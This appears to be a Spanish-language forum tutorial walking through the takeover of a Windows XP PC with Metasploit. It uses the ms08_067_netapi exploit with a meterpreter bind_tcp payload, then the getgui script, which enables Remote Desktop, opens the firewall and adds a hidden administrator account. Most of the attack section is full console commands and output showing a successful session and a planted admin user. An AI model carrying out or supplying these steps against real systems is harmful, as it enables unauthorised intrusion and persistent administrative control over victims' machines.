[Metasploit By: Shell Root]
Una de las muchas herramientas que trae integrada el Metasploit aparte de la que ya hemos visto (keyylogger, Screenshot, Ver Escritorio Remoto ). Tambien podemos agregar un usuario y habilitar el escritorio remoto de la P.C Remota con tan solo una ejecucion de un comando. Aquí veremos el uso de esté servicio del Metasploit.
Primero ingresaremos a la P.C con el exploit:
* exploit/windows/smb/ms08_067_netapi
y con el PAYLOAD:
* windows/meterpreter/bind_tcp
* windows/meterpreter/reverse_tcp
En este caso usaremos el PAYLOAD windows/shell/bind_tcp.
Código:
888 888 d8b888 888 888 Y8P888 888 888 888 88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888 888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888 888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888 888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b. 888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888 888 888 888 =[ metasploit v3.3.2-release [core:3.3 api:1.0] + -- --=[ 462 exploits - 219 auxiliary + -- --=[ 192 payloads - 22 encoders - 8 nops =[ svn r7808 updated 10 days ago (2009.12.10) Warning: This copy of the Metasploit Framework was last updated 10 days ago. We recommend that you update the framework at least every other day. For information on updating your copy of Metasploit, please see: http://dev.metasploit.com/redmine/projects/framework/wiki/Updating msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3 RHOST => 192.168.0.3 msf exploit(ms08_067_netapi) > set PAYLOAD windows/bind_tcp [-] The value specified for PAYLOAD is not valid. msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > exploit[*] Started bind handler[*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 2 - lang:Spanish[*] Selected Target: Windows XP SP2 Spanish (NX)[*] Triggering the vulnerability...[*] Sending stage (723456 bytes)[*] Meterpreter session 1 opened (192.168.0.2:12995 -> 192.168.0.3:4444) meterpreter >
Ahora que tenemos el Meterpreter ejecutamos el comando run getgui. Miremos que opciones tiene.
Código:
meterpreter > run getgui Windows Remote Desktop Enabler Meterpreter Script Usage: getgui -u <username> -p <password> Or: getgui -e OPTIONS: -e Enable RDP only. -h Help menu. -p <opt> The Password of the user to add. -u <opt> The Username of the user to add. meterpreter >
Ahora ingresamos los parametros necesarios para perfecta ejecución del exploit. Así:
Código:
meterpreter > run getgui -u Shell -p Root[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator[*] Carlos Perez carlos_perez@darkoperator.com[*] Enabling Remote Desktop[*] RDP is disabled; enabling it ...[*] Setting Terminal Services service startup mode[*] The Terminal Services service is not set to auto, changing it to auto ...[*] Opening port in local firewall if necessary[*] Setting user account for logon[*] Adding User: Shell with Password: Root[*] Adding User: Shell to local group Remote Desktop Users[*] Adding User: Shell to local group Administrators[*] You can now login with the created user
Ahora ya tan solo nos queda conectarnos desde la Conexión a Escritorio remoto que trae integrado Windows.
[youtube=http://www.youtube.com/watch?v=VKLNgMgVtvs]
By: Shell Root
Fuente: Habilitar Escritorio Remoto